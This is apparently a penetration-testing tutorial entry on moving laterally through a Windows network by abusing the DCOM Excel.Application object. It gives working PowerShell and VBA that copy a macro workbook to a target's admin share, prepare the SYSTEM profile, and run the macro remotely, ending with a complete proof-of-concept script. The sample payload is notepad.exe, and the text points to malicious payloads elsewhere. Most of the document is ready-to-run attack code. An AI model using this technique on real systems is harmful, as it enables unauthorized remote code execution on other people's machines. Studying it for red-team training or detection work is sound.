Consider the DCOM object Excel.Application:

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110")) # remote IP
 
$com | Get-Member # enumerate all methods and sub-objects

Get-Member would reveal that Excel.Application has a Run method, which can be used to run macros from a Excel document remotely. We can use this PoC macro below and add it to a Excel spreadsheet (See Examples for malicious payloads):

Sub mymacro()
    Shell ("notepad.exe")
End Sub

Upload the file to the target machine:

$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
 
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
 
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)

Excel.Application will run with SYSTEM permissions through DCOM. Opening a document and thereby starting a process requires a profile, which SYSTEM doesn’t have by default. Creating a Desktop folder for it resolves the issue:

$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
 
$temp = [system.io.directory]::createDirectory($Path)

Use Excel.Application.Workbooks.Open to access the uploaded .xls file and run the macro:

$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")

Here’s a complete PoC compiled from the previous snippets:

$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application", "192.168.1.110"))
 
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xlsm"
$RemotePath = "\\192.168.1.110\c$\myexcel.xlsm"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
 
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xlsm")
$com.Run("mymacro")